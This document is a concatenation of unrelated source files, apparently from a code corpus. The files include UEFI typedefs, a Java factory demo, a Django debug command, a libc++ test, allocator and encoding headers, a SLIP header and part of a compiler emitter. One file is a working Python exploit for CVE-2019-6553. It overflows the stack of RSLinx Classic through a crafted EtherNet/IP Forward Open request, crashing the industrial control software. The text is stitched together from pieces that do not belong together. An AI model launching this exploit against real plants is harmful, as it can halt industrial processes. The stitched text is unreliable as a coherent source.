PEI_SMBUS_NOTIFY_FUNCTION EFI_PEI_SMBUS_NOTIFY_FUNCTION; typedef PEI_SMBUS_PPI_ARP_DEVICE EFI_PEI_SMBUS_PPI_ARP_DEVICE; typedef PEI_SMBUS_PPI_GET_ARP_MAP EFI_PEI_SMBUS_PPI_GET_ARP_MAP; typedef PEI_SMBUS_PPI_NOTIFY EFI_PEI_SMBUS_PPI_NOTIFY; typedef PEI_BOOT_SCRIPT_EXECUTE EFI_PEI_BOOT_SCRIPT_EXECUTE; typedef PEI_BOOT_SCRIPT_EXECUTER_PPI EFI_PEI_BOOT_SCRIPT_EXECUTER_PPI; typedef EFI_FIND_FV_FINDFV EFI_PEI_FIND_FV_FINDFV; typedef EFI_FIND_FV_PPI EFI_PEI_FIND_FV_PPI; typedef PEI_RECOVERY_BLOCK_IO_INTERFACE EFI_PEI_RECOVERY_BLOCK_IO_PPI; typedef PEI_LBA EFI_PEI_LBA; typedef PEI_BLOCK_IO_MEDIA EFI_PEI_BLOCK_IO_MEDIA; typedef PEI_BLOCK_DEVICE_TYPE EFI_PEI_BLOCK_DEVICE_TYPE; typedef PEI_GET_NUMBER_BLOCK_DEVICES EFI_PEI_GET_NUMBER_BLOCK_DEVICES; typedef PEI_GET_DEVICE_MEDIA_INFORMATION EFI_PEI_GET_DEVICE_MEDIA_INFORMATION; typedef PEI_READ_BLOCKS EFI_PEI_READ_BLOCKS; typedef PEI_DEVICE_RECOVERY_MODULE_INTERFACE EFI_PEI_DEVICE_RECOVERY_MODULE_PPI; typedef PEI_DEVICE_GET_NUMBER_RECOVERY_CAPSULE EFI_PEI_DEVICE_GET_NUMBER_RECOVERY_CAPSULE; typedef PEI_DEVICE_GET_RECOVERY_CAPSULE_INFO EFI_PEI_DEVICE_GET_RECOVERY_CAPSULE_INFO; typedef PEI_DEVICE_LOAD_RECOVERY_CAPSULE EFI_PEI_DEVICE_LOAD_RECOVERY_CAPSULE; #endif
6,954
738
public class FactoryTest { public static void main(String[] args) { Product pencil = ProductFactory.getProduct("Pencil"); pencil.sell(); // sell Pencil !!! Product note = ProductFactory.getProduct("Note"); note.sell(); // sell Note !!! } } interface Product { public void sell(); } class Pencil implements Product { @Override public void sell() { System.out.println("sell Pencil !!!"); } } class Note implements Product { @Override public void sell() { System.out.println("sell Note !!!"); } } class ProductFactory { public static Product getProduct(String className) { Product p = null; switch (className) { case "Pencil": p = new Pencil(); break; case "Note": p = new Note(); break; } return p; } }
337
796
<reponame>donroyco/falco<filename>backend/core/management/commands/rundebugserver.py import os from django.contrib.staticfiles.management.commands import runserver class Command(runserver.Command): def handle(self, *args, **options): # Try to enable vscode debugger try: import ptvsd # We only run the ptvsd server once, on PID 1 # Otherwise django attempts to start the server on every refresh. if os.getpid() != 1 and not ptvsd.is_attached(): ptvsd.enable_attach(address=("0.0.0.0", 9000), redirect_output=True) print("🖥 Remote debugger running.") except (ImportError, OSError) as e: print("⚠️ Couldn't start remote debugger:", e) super(Command, self).handle(*args, **options)
343
2,338
<reponame>mkinsner/llvm<filename>libcxx/test/std/containers/sequences/array/array.tuple/get.pass.cpp //===----------------------------------------------------------------------===// // // Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. // See https://llvm.org/LICENSE.txt for license information. // SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception // //===----------------------------------------------------------------------===// // <array> // template <size_t I, class T, size_t N> T& get(array<T, N>& a); #include <array> #include <cassert> #include "test_macros.h" template <typename ...T> TEST_CONSTEXPR std::array<int, sizeof...(T)> tempArray(T ...args) { return {args...}; } TEST_CONSTEXPR_CXX14 bool tests() { { std::array<double, 1> array = {3.3}; assert(std::get<0>(array) == 3.3); std::get<0>(array) = 99.1; assert(std::get<0>(array) == 99.1); } { std::array<double, 2> array = {3.3, 4.4}; assert(std::get<0>(array) == 3.3); assert(std::get<1>(array) == 4.4); std::get<0>(array) = 99.1; std::get<1>(array) = 99.2; assert(std::get<0>(array) == 99.1); assert(std::get<1>(array) == 99.2); } { std::array<double, 3> array = {3.3, 4.4, 5.5}; assert(std::get<0>(array) == 3.3); assert(std::get<1>(array) == 4.4); assert(std::get<2>(array) == 5.5); std::get<1>(array) = 99.2; assert(std::get<0>(array) == 3.3); assert(std::get<1>(array) == 99.2); assert(std::get<2>(array) == 5.5); } { std::array<double, 1> array = {3.3}; static_assert(std::is_same<double&, decltype(std::get<0>(array))>::value, ""); } { assert(std::get<0>(tempArray(1, 2, 3)) == 1); assert(std::get<1>(tempArray(1, 2, 3)) == 2); assert(std::get<2>(tempArray(1, 2, 3)) == 3); } return true; } int main(int, char**) { tests(); #if TEST_STD_VER >= 14 static_assert(tests(), ""); #endif return 0; }
950
303
/* * 42TinyJS * * A fork of TinyJS with the goal to make a more JavaScript/ECMA compliant engine * * Authored By <NAME> <<EMAIL>> * * Copyright (C) 2010-2015 ardisoft * * * Permission is hereby granted, free of charge, to any person obtaining a copy of * this software and associated documentation files (the "Software"), to deal in * the Software without restriction, including without limitation the rights to * use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies * of the Software, and to permit persons to whom the Software is furnished to do * so, subject to the following conditions: * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ #ifndef pool_allocator_h__ #define pool_allocator_h__ #include <typeinfo> #include <stdint.h> #include <string> #include "config.h" #ifndef NO_THREADING # if SPINLOCK_IN_POOL_ALLOCATOR # include <atomic> # else # include "TinyJS_Threading.h" # endif #endif /************************************************************************ * TinyJS allocates and frees objects many, many times. * To prevent memory fragmentation and to speed up allocation and freeing, I have * added a pool_allocator to 42TinyJS. This allocator allocates objects in pools * of 64. When an object is needed, it can be allocated from such a pool faster than * from the heap. 
************************************************************************/ #if !defined(DEBUG_POOL_ALLOCATOR) && (defined(_DEBUG) || defined(LOG_POOL_ALLOCATOR_MEMORY_USAGE)) # define DEBUG_POOL_ALLOCATOR #endif struct block_head; class fixed_size_allocator { public: ~fixed_size_allocator(); static void *alloc(size_t,const char* for_class=0); static void free(void *, size_t); size_t objectSize() { return object_size; } #ifndef NO_THREADING # if SPINLOCK_IN_POOL_ALLOCATOR static std::atomic_flag locker; # else static CScriptMutex locker; # endif #endif private: fixed_size_allocator(size_t num_objects, size_t object_size, const char* for_class); fixed_size_allocator(const fixed_size_allocator&); fixed_size_allocator& operator=(const fixed_size_allocator&); void *_alloc(size_t); bool _free(void* p, size_t); size_t num_objects; size_t object_size; void *head_of_free_list; block_head *head; int refs; #ifdef DEBUG_POOL_ALLOCATOR // Debug std::string name; int allocs; int frees; int current; int max; int blocks; #endif }; //************************************************************************************** template<typename T, int num_objects=64> class fixed_size_object { public: static void* operator new(size_t size) { #ifdef DEBUG_POOL_ALLOCATOR return fixed_size_allocator::alloc(size, typeid(T).name()); #else return fixed_size_allocator::alloc(size); #endif } static void* operator new(size_t size, void* p) { return p; } static void operator delete(void* p, size_t size) { fixed_size_allocator::free(p, size); } private: }; #if 0 // under construction template<typename T> class block_allocator_stl { public : // typedefs typedef T value_type; typedef value_type* pointer; typedef const value_type* const_pointer; typedef value_type& reference; typedef const value_type& const_reference; typedef std::size_t size_type; typedef std::ptrdiff_t difference_type; public : // convert an allocator<T> to allocator<U> template<typename U> struct rebind { typedef block_allocator_stl<U> other; }; inline explicit block_allocator_stl() {} inline ~block_allocator_stl() {} inline block_allocator_stl(block_allocator_stl const&) {} template<typename U> inline block_allocator_stl(block_allocator_stl<U> const&) {} inline block_allocator_stl<T> &operator=(block_allocator_stl<T> const&) {} template<typename U> inline block_allocator_stl<T> &operator=(block_allocator_stl<U> const&) {} // address inline pointer address(reference r) { return &r; } inline const_pointer address(const_reference r) { return &r; } // memory allocation inline pointer allocate(size_type cnt, const void*) { return reinterpret_cast<pointer>(fixed_size_allocator::get(cnt * sizeof (T), true, typeid(T).name())->alloc(cnt * sizeof (T))); // return reinterpret_cast<pointer>(::operator new(cnt * sizeof (T))); } inline void deallocate(pointer p, size_type cnt) { fixed_size_allocator::get(cnt * sizeof (T), false)->free(p, cnt * sizeof (T)); // ::operator delete(p); } // size inline size_type max_size() const { return SIZE_MAX / sizeof(T); } inline void construct(pointer _Ptr, value_type& _Val) { ::new ((void*)_Ptr) value_type(_Val); } inline void destroy(pointer _Ptr) { _Ptr->~value_type(); } }; #endif #endif // pool_allocator_h__
1,763
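A usage sketch for fixed_size_object<> above (illustrative only, not part of 42TinyJS): a small, frequently allocated class opts into the pool by deriving from fixed_size_object of itself, so its operator new/delete route through fixed_size_allocator instead of the global heap.

#include "pool_allocator.h"

// Hypothetical example class; any small object allocated in large numbers
// is a good candidate for the pool.
class PooledNode : public fixed_size_object<PooledNode> {
public:
    explicit PooledNode(int v) : value(v), next(0) {}
    int value;
    PooledNode *next;
};

void pool_example() {
    // Both objects are served from a shared pool sized for PooledNode
    // (grown 64 objects at a time) rather than from individual heap allocations.
    PooledNode *a = new PooledNode(1);
    PooledNode *b = new PooledNode(2);
    a->next = b;
    delete b;
    delete a;   // freed blocks go back onto the pool's free list
}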
1,007
## # Exploit Title: RSLinx Classic - stack overflow # Date: 06/11/2019 # Exploit Author: <NAME> # CVE : CVE-2019-6553 # Advisory: https://www.tenable.com/security/research/tra-2019-11 # Affected Vendors/Device/Firmware: # - RSLinx Classic 4.10.00 and earlier ## import sys, socket, binascii from struct import * def usage(): print "usage : "+sys.argv[0] + " <target_ip> <target_port>" print "example: "+sys.argv[0] + " 192.168.1.123 44818" def mk_msg(cmd, dlen=None,session=0, status=0, sender='\x00'*8, options=0, data=''): if dlen is None: dlen = len(data) return pack('<HHLL8sL', cmd, dlen, session, status, sender, options) + data def mk_type(id, size=None, data=''): if size is None: size = len(data) return pack('<HH', id, size) + data if len(sys.argv) != 3: usage() sys.exit() host = str(sys.argv[1]) port = int(sys.argv[2]) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((host, port)) # Register Session msg = mk_msg(cmd=0x65,data=pack('<HH',1,0)) s.send(msg) res = s.recv(1024) print binascii.hexlify(res) cmd, dlen, session, status, sender, options = unpack('<HHLL8sL',res[0:24]) if(cmd != 0x65 or status != 0): print 'RegisterSession command failed.' s.close(); sys.exit() b2 = '\x54' # service code: Forward Open # vulnerble function is also reachable via # other services (i.e., 0x52, 0x53, etc.) b2 += '\x02' # 2 req path segments b2 += '\x20\x06' # class: Connection Manager b2 += '\x24\x01' # Instance 1 b2 += '\x00' # priority/tick_time b2 += '\xf9' # timeout ticks b2 += pack('<L',0x80000031) # O -> T network connection id b2 += pack('<L',0x80fe0030) # T -> O network connection id b2 += pack('<H',0x1337) # connection serial number b2 += pack('<H',0x1234) # vendor id b2 += pack('<L',0xdeadbeef) # originator serialnumber b2 += '\x00' # connection timeout multiplier b2 += '\x00\x00\x00' # reserved b2 += pack('<L',0x007a1200) # O -> T RPI b2 += pack('<H',0x0001) # O -> T connection param b2 += pack('<L',0x007a1200) # T -> O RPI b2 += pack('<H',0x0001) # T -> O connection param b2 += '\xa3' # transport_type # Create a connection path cp = '\x01\x00' # Port Segment: port id 1, link addr 0x00 # Add a long Electronic Key Segment cp_max = 0xff * 2; eks_len = (cp_max - 6 - 2) / 2 eks = '\x34' + pack('<B',eks_len) + 'A' * eks_len * 2 cp += eks # Add Class and Instance logical segments cp += '\x20\x02\x24\x01' if (len(cp) % 2): cp += '\x00' cp_size = len(cp) / 2; b2 += pack('<B',cp_size) # connection path in wordsize b2 += cp # connection path data = pack('<L',0) # interface data += pack('<H',0) # timeout data += pack('<H',2) # number of items data += mk_type(0) # address item data += mk_type(id=0xb2, data=b2) # data item msg = mk_msg(cmd=0x6f,session=session,data=data) s.send(msg) # RSLINX.exe should die res = s.recv(1024) print binascii.hexlify(res)
1,434
442
#!/usr/bin/python # -*- coding: utf-8 -*- """ Examples for Python-nvd3 is a Python wrapper for NVD3 graph library. NVD3 is an attempt to build re-usable charts and chart components for d3.js without taking away the power that d3.js gives you. Project location : https://github.com/areski/python-nvd3 """ from nvd3 import lineWithFocusChart import random import datetime import time start_time = int(time.mktime(datetime.datetime(2012, 6, 1).timetuple()) * 1000) nb_element = 100 # Open File for test output_file = open('test_lineWithFocusChart.html', 'w') # --------------------------------------- type = "lineWithFocusChart" chart = lineWithFocusChart(name=type, height=550, width=850, color_category='category20b', x_is_date=True, x_axis_format="%d %b %Y %H", focus_enable=True) chart.set_containerheader("\n\n<h2>" + type + "</h2>\n\n") xdata = list(range(nb_element)) xdata = [start_time + x * 1000000000 for x in xdata] ydata = [i + random.randint(-10, 10) for i in range(nb_element)] ydata2 = [x * 2 for x in ydata] ydata3 = [x * 3 for x in ydata] ydata4 = [x * 4 for x in ydata] extra_serie = {"tooltip": {"y_start": "There is ", "y_end": " calls"}, "date_format": "%d %b %Y %H:%M:%S %p"} # extra_serie = None chart.add_serie(name="serie 1", y=ydata, x=xdata, extra=extra_serie) chart.add_serie(name="serie 2", y=ydata2, x=xdata, extra=extra_serie) chart.add_serie(name="serie 3", y=ydata3, x=xdata, extra=extra_serie) chart.add_serie(name="serie 4", y=ydata4, x=xdata, extra=extra_serie) chart.buildhtml() output_file.write(chart.htmlcontent) # close Html file output_file.close()
675
3,380
{ "validation": [ { "gem_id": "e2e_nlg-validation-110", "meaning_representation": "name[Aromi], eatType[coffee shop], food[Chinese], customer rating[1 out of 5], area[riverside]", "references": [ "There is an Chinese coffee shop named Aromi near the riverside that has 1 out of 5 in the customer ranking and friendly with kid" ], "target": "There is an Chinese coffee shop named Aromi near the riverside that has 1 out of 5 in the customer ranking and friendly with kid" } ] }
237
496
<gh_stars>100-1000 /* * Copyright (C) 2019 <NAME> * * Author: <NAME> <<EMAIL>> */ /* * Caution! * This file generated by the script "utils/lexbor/encoding/single-byte.py"! * Do not change this file! */ #ifndef LEXBOR_ENCODING_SINGLE_H #define LEXBOR_ENCODING_SINGLE_H #ifdef __cplusplus extern "C" { #endif #include "lexbor/encoding/base.h" #include "lexbor/core/shs.h" #define LXB_ENCODING_SINGLE_HASH_IBM866_SIZE 344 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_10_SIZE 343 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_13_SIZE 345 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_14_SIZE 407 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_15_SIZE 344 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_16_SIZE 413 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_2_SIZE 368 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_3_SIZE 343 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_4_SIZE 343 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_5_SIZE 343 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_6_SIZE 343 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_7_SIZE 344 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_8_SIZE 347 #define LXB_ENCODING_SINGLE_HASH_KOI8_R_SIZE 486 #define LXB_ENCODING_SINGLE_HASH_KOI8_U_SIZE 380 #define LXB_ENCODING_SINGLE_HASH_MACINTOSH_SIZE 343 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1250_SIZE 432 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1251_SIZE 362 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1252_SIZE 373 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1253_SIZE 354 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1254_SIZE 354 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1255_SIZE 467 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1256_SIZE 343 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1257_SIZE 355 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1258_SIZE 405 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_874_SIZE 359 #define LXB_ENCODING_SINGLE_HASH_X_MAC_CYRILLIC_SIZE 373 LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_ibm866[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_10[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_13[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_14[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_15[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_16[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_2[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_3[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_4[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_5[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_6[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_7[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_8[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_koi8_r[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_koi8_u[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_macintosh[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1250[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1251[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1252[128]; LXB_EXTERN const lxb_encoding_single_index_t 
lxb_encoding_single_index_windows_1253[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1254[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1255[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1256[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1257[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1258[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_874[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_x_mac_cyrillic[128]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_ibm866[345]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_10[344]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_13[346]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_14[408]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_15[345]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_16[414]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_2[369]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_3[344]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_4[344]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_5[344]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_6[344]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_7[345]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_8[348]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_koi8_r[487]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_koi8_u[381]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_macintosh[351]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1250[433]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1251[363]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1252[374]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1253[355]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1254[355]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1255[468]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1256[357]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1257[356]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1258[406]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_874[360]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_x_mac_cyrillic[374]; #ifdef __cplusplus } /* extern "C" */ #endif #endif /* LEXBOR_ENCODING_SINGLE_H */
2,829
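A generic illustration of how 128-entry single-byte tables like the lxb_encoding_single_index_* arrays above are typically used (deliberately not lexbor's public API — the real decoder sits behind lexbor's encoding functions): bytes below 0x80 map straight to ASCII, while the high half is looked up in the per-encoding table.

#include <stdint.h>

// Stand-in for lxb_encoding_single_index_t: one Unicode code point per slot.
struct demo_single_index {
    uint32_t codepoint;
};

// Decode one byte of a single-byte encoding using a 128-entry table for
// the 0x80..0xFF range.
static uint32_t
demo_decode_byte(const demo_single_index index[128], uint8_t byte)
{
    if (byte < 0x80) {
        return byte;                        // ASCII range passes through
    }
    return index[byte - 0x80].codepoint;    // high half goes through the table
}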
2,701
/* * Copyright (c) 2016 Cesanta Software Limited * All rights reserved * * This program is free software; you can redistribute it and/or modify it under * the terms of the GNU General Public License as published by the Free Software * Foundation; either version 2 of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. * * You should have received a copy of the GNU General Public License along with * this program; if not, write to the Free Software Foundation, Inc., 51 Franklin * Street, Fifth Floor, Boston, MA 02110-1301 USA. */ #ifndef SLIP_H_ #define SLIP_H_ #ifdef ESP8266 #include <c_types.h> #else #include <stdint.h> #endif /* Send the SLIP frame begin/end delimiter. */ void SLIP_send_frame_delimiter(void); /* Send a single character of SLIP frame data, escaped as per SLIP escaping. */ void SLIP_send_frame_data(char ch); /* Send some SLIP frame data, escaped as per SLIP escaping. */ void SLIP_send_frame_data_buf(const void *buf, uint32_t size); /* Send a full SLIP frame, with specified contents. */ void SLIP_send(const void *pkt, uint32_t size); typedef enum { SLIP_NO_FRAME, SLIP_FRAME, SLIP_FRAME_ESCAPING } slip_state_t; int16_t SLIP_recv_byte(char byte, slip_state_t *state); #define SLIP_FINISHED_FRAME -2 #define SLIP_NO_BYTE -1 /* Receive a SLIP frame, with specified contents. */ uint32_t SLIP_recv(void *pkt, uint32_t max_len); #endif /* SLIP_H_ */
531
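A usage sketch for the SLIP helpers above (illustrative only, not part of the original sources). uart_read_char() is a hypothetical, platform-specific byte source, and the include name is assumed from the header guard; SLIP_recv() already wraps this loop, the manual version just shows the SLIP_recv_byte() state machine.

#include <stdint.h>

#include "slip.h"                      // assumed header name

extern char uart_read_char(void);      // hypothetical platform byte source

static uint8_t frame_buf[256];

// Reassemble one SLIP frame byte by byte; returns the payload length.
static uint32_t receive_one_frame(void)
{
    slip_state_t state = SLIP_NO_FRAME;
    uint32_t len = 0;

    for (;;) {
        int16_t r = SLIP_recv_byte(uart_read_char(), &state);
        if (r == SLIP_FINISHED_FRAME) {
            return len;                            // complete frame sits in frame_buf
        }
        if (r != SLIP_NO_BYTE && len < sizeof(frame_buf)) {
            frame_buf[len++] = (uint8_t)r;         // decoded payload byte
        }
    }
}

static void send_one_frame(const void *payload, uint32_t size)
{
    SLIP_send(payload, size);   // adds delimiters and escapes the payload
}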
303
<gh_stars>100-1000 #include <string.h> #include <inttypes.h> #include "lily_alloc.h" #include "lily_ast.h" #include "lily_value.h" #include "lily_emitter.h" #include "lily_opcode.h" #include "lily_emit_table.h" #include "lily_parser.h" #include "lily_opcode_table.h" #include "lily_cls_function.h" /** Emitter is responsible for: * Taking in a given tree and writing out code that represents it. In the case of lambdas, it will dispatch into parser to process the lambdas block. * Verifying that call argument counts are correct, and that types are valid. * Doing block handling + validation (if/elif/else, for.., etc.) * Preparing functions to be called by the vm when functions exit. **/ # define IS_LOOP_BLOCK(b) (b == BLOCK_WHILE || \ b == BLOCK_DO_WHILE || \ b == BLOCK_FOR_IN) # define lily_raise_adjusted(r, adjust, error_code, message, ...) \ { \ r->line_adjust = adjust; \ lily_raise(r, error_code, message, __VA_ARGS__); \ } static int type_matchup(lily_emit_state *, lily_type *, lily_ast *); static void eval_tree(lily_emit_state *, lily_ast *, lily_type *, int); static void eval_variant(lily_emit_state *, lily_ast *, lily_type *, int); static void add_call_state(lily_emit_state *); /*****************************************************************************/ /* Emitter setup and teardown */ /*****************************************************************************/ lily_emit_state *lily_new_emit_state(lily_options *options, lily_symtab *symtab, lily_raiser *raiser) { lily_emit_state *emit = lily_malloc(sizeof(lily_emit_state)); emit->patches = lily_malloc(sizeof(int) * 4); emit->match_cases = lily_malloc(sizeof(int) * 4); emit->ts = lily_new_type_system(options, symtab, raiser); emit->code = lily_malloc(sizeof(uint16_t) * 32); emit->closed_syms = lily_malloc(sizeof(lily_sym *) * 4); emit->transform_table = NULL; emit->transform_size = 0; emit->call_values = lily_malloc(sizeof(lily_sym *) * 8); emit->call_state = NULL; emit->code_pos = 0; emit->code_size = 32; emit->call_values_pos = 0; emit->call_values_size = 8; emit->closed_pos = 0; emit->closed_size = 4; emit->match_case_pos = 0; emit->match_case_size = 4; emit->block = NULL; emit->unused_storage_start = NULL; emit->all_storage_start = NULL; emit->all_storage_top = NULL; emit->patch_pos = 0; emit->patch_size = 4; emit->lambda_depth = 0; emit->function_depth = 0; emit->current_class = NULL; emit->raiser = raiser; emit->expr_num = 1; emit->loop_start = -1; add_call_state(emit); return emit; } void lily_free_emit_state(lily_emit_state *emit) { lily_block *current, *temp; lily_storage *current_store, *temp_store; current = emit->block; while (current && current->prev) current = current->prev; while (current) { temp = current->next; lily_free(current); current = temp; } current_store = emit->all_storage_start; while (current_store) { temp_store = current_store->next; lily_free(current_store); current_store = temp_store; } lily_emit_call_state *call_iter = emit->call_state; if (call_iter) { while (call_iter->prev != NULL) call_iter = call_iter->prev; lily_emit_call_state *call_next; while (call_iter) { call_next = call_iter->next; lily_free(call_iter); call_iter = call_next; } } lily_free(emit->transform_table); lily_free(emit->closed_syms); lily_free(emit->call_values); lily_free_type_system(emit->ts); lily_free(emit->match_cases); lily_free(emit->patches); lily_free(emit->code); lily_free(emit); } /*****************************************************************************/ /* Writing functions */ 
/*****************************************************************************/

/*  small_grow
    Grow the size of emitter's current code block once. This should be called
    if a grow must be done, and the code to be written is not a variable size.

    This is intended to be called by individual write_* functions which will
    only need one grow at the most. */
static void small_grow(lily_emit_state *emit)
{
    emit->code_size *= 2;
    emit->code = lily_realloc(emit->code, sizeof(uint16_t) * emit->code_size);
}

/*  write_prep
    This ensures that the current function can take 'size' more blocks of
    code. This will grow emitter's code until it's the right size, if
    necessary. */
static void write_prep(lily_emit_state *emit, int size)
{
    if ((emit->code_pos + size) > emit->code_size) {
        while ((emit->code_pos + size) > emit->code_size)
            emit->code_size *= 2;

        emit->code = lily_realloc(emit->code,
                sizeof(uint16_t) * emit->code_size);
    }
}

/* These next five functions write a particular number of instructions to code
   and increment the code's position.
   Some tips on writing instructions to code:
   * write_5 and write_2 is better than inlining a "write_7", except for
     certain circumstances.
   * If implementing new instructions, 'show' is helpful when debugging. */
static void write_1(lily_emit_state *emit, uint16_t one)
{
    if ((emit->code_pos + 1) > emit->code_size)
        small_grow(emit);

    emit->code[emit->code_pos] = one;
    emit->code_pos += 1;
}

static void write_2(lily_emit_state *emit, uint16_t one, uint16_t two)
{
    if ((emit->code_pos + 2) > emit->code_size)
        small_grow(emit);

    emit->code[emit->code_pos] = one;
    emit->code[emit->code_pos + 1] = two;
    emit->code_pos += 2;
}

static void write_3(lily_emit_state *emit, uint16_t one, uint16_t two,
        uint16_t three)
{
    if ((emit->code_pos + 3) > emit->code_size)
        small_grow(emit);

    emit->code[emit->code_pos] = one;
    emit->code[emit->code_pos + 1] = two;
    emit->code[emit->code_pos + 2] = three;
    emit->code_pos += 3;
}

static void write_4(lily_emit_state *emit, uint16_t one, uint16_t two,
        uint16_t three, uint16_t four)
{
    if ((emit->code_pos + 4) > emit->code_size)
        small_grow(emit);

    emit->code[emit->code_pos] = one;
    emit->code[emit->code_pos + 1] = two;
    emit->code[emit->code_pos + 2] = three;
    emit->code[emit->code_pos + 3] = four;
    emit->code_pos += 4;
}

static void write_5(lily_emit_state *emit, uint16_t one, uint16_t two,
        uint16_t three, uint16_t four, uint16_t five)
{
    if ((emit->code_pos + 5) > emit->code_size)
        small_grow(emit);

    emit->code[emit->code_pos] = one;
    emit->code[emit->code_pos + 1] = two;
    emit->code[emit->code_pos + 2] = three;
    emit->code[emit->code_pos + 3] = four;
